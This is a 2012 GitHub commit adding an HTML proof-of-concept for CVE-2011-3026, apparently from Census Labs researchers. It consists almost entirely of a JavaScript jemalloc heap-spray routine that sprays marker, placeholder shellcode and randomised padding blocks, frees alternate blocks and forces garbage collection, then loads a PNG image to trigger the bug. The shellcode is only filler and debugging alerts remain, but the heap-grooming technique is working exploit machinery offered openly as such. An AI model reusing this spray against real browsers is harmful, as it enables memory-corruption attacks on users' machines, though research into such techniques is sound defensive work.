jemalloc heap arrangement

argp · Aug 2, 2012 · daebf4d · daebf4d
1 parent 6e39a19
commit daebf4d
Showing 1 changed file with 101 additions and 0 deletions.
diff --git a/cve-2011-3026.html b/cve-2011-3026.html
@@ -0,0 +1,101 @@
+<html>
+<head>
+<script>
+
+function jemalloc_spray(blocks, size)
+{
+    // Copyright (c) 2012 Patroklos Argyroudis <argp at domain census-labs.com>
+    // Copyright (c) 2012 Chariton Karamitas <huku at domain census-labs.com>
+    // Copyright (c) 2012 Census, Inc. (http://www.census-labs.com/)
+
+    var block_size = size / 2;
+
+    // rop/bootstrap/whatever
+    var marker = unescape("%ubeef%udead");
+    marker += marker;
+
+    // shellcode/payload
+    var content = unescape("%u6666%u6666");
+
+    while(content.length < (block_size / 2))
+    {
+        content += content;
+    }
+
+    var arr = [];
+
+    for(i = 0; i < blocks; i++)
+    {
+        // construct the random block padding (corelanc0d3r's trick)
+        var rnd1 = Math.floor(Math.random() * 1000) % 16;
+        var rnd2 = Math.floor(Math.random() * 1000) % 16;
+        var rnd3 = Math.floor(Math.random() * 1000) % 16;
+        var rnd4 = Math.floor(Math.random() * 1000) % 16;
+
+        var rndstr = "%u" + rnd1.toString() + rnd2.toString();
+        rndstr += "%u" + rnd3.toString() + rnd4.toString();
+
+        var padding = unescape(rndstr);
+
+        while(padding.length < block_size - marker.length - content.length)
+        {
+            padding += padding;
+        }
+
+        // construct the block
+        var block = marker + content + padding;
+
+        // if required repeat the block
+        while(block.length < block_size)
+        {
+            block += block;
+        }
+
+        // spray block
+        arr[i] = block.substr(0);
+    }
+
+    // for debugging
+    Math.asin(1);
+
+    for(i = 0; i < blocks; i += 2)
+    {
+        delete(arr[i]);
+        arr[i] = null;
+    }
+
+    var ret = trigger_gc();
+
+    alert("After garbage collection: " + ret.length);
+
+    // for debugging
+    Math.atan2(6, 6);
+
+    return arr;
+}
+
+function trigger_gc()
+{
+    var gc = [];
+
+    for(i = 0; i < 100000; i++)
+    {
+        gc[i] = new Array();
+    }
+
+    return gc;
+}
+
+// 1000 spray blocks of size 630 (target run size: 1024)
+var foo = jemalloc_spray(1000, 630);
+
+// alert(foo.length);
+
+</script>
+</head>
+
+<body>
+CVE-2011-3026 is fun
+<p><img src="cve-2011-3026.png">
+</body>
+</html>